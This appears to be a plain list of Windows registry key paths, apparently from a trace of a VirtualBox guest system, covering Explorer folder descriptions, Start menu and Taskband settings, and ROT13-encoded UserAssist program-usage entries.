HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PropertyBag
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs
HKEY_CLASSES_ROOT\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere (64-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\HRZR_PGYPHNPbhag:pgbe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary.Gnfxone
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IOBKJVAQBJFNQQVGVBAF-NZQ64.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\IObkQeiVafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\ertrqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\IOBKFIE\Qbjaybnqf\9.0_NqorEqe90_ra_HF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfvrkrp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.JvaqbjfVafgnyyre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\CVY-1.1.7.jva32-cl2.7.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\wqx-7-jvaqbjf-v586.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\frghc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Q:\IObkJvaqbjfNqqvgvbaf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\HfreNppbhagPbagebyFrggvatf.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erxrljvm.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zzp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\frgup.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FlfgrzCebcregvrfNqinaprq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qrfxgbc\AQC451-XO2858728-k86-k64-NyyBF-RAH.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\JVAJBEQ.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\RKPRY.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BHGYBBX.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\CBJRECAG.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BARABGR.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Ernqre 9.0\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Benpyr\IveghnyObk Thrfg Nqqvgvbaf\havafg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Grzc\~afh.gzc\Nh_.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jvaire.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clgubaj.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{7SR8Q22N-SO1Q-N8OR-01R3-6P8693961R6R}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.64Ovg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\Nhgbehaf64.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jrypbzr Pragre.yax
